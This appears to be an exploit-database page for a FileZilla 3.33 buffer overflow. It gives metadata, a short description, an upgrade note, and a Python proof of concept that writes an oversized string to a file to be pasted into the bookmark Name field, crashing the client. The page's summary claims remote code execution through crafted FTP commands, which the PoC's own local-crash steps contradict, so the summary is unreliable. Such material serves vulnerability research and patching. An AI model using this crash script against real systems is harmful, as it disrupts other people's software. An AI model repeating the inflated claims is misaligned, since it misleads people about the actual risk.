FileZilla 3.33 Buffer-Overflow (PoC)

vendor:

FileZilla

by:

Kağan Çapar

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: FileZilla

Affected Version From: 3.33

Affected Version To: 3.33

Patch Exists: YES

Related CWE: N/A

CPE: a:filezilla:filezilla:3.33

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux 2018.3 x64

2018

FileZilla 3.33 Buffer-Overflow (PoC)

A buffer overflow vulnerability exists in FileZilla 3.33, which could allow an attacker to execute arbitrary code on the target system. The vulnerability is due to a lack of proper validation of user-supplied input when handling FTP commands. An attacker can exploit this vulnerability by sending a specially crafted FTP command to the target system. Successful exploitation of this vulnerability could result in arbitrary code execution on the target system.

Mitigation:

Upgrade to the latest version of FileZilla, which is 3.45.1.

Source

Exploit-DB raw data:

# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)

# Author: Kağan Çapar

# Discovery Date: 2018-10-10

# Software Link: https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/filezilla/3.33.0-1/filezilla_3.33.0-1.debian.tar.xz

# Vendor Homepage : https://filezilla-project.org

# Tested Version: 3.33

# Tested on OS: Kali Linux 2018.3 x64

# Steps to Reproduce: Run the python exploit script, it will create a new

# file with the name "exploit.txt". Copy the content from "exploit.txt".

# Open new terminal and write "filezilla"

# Go to Bookmarks and Add bookmark or Ctrl + B  

# Now paste the contents of "exploit.txt" into the fields. "Name:"

# Click "OK" after Click "Bookmarks" you will see a crash on terminal.

#!/usr/bin/python
    
buffer = "\x50\x48\x52" * 1300
 
payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"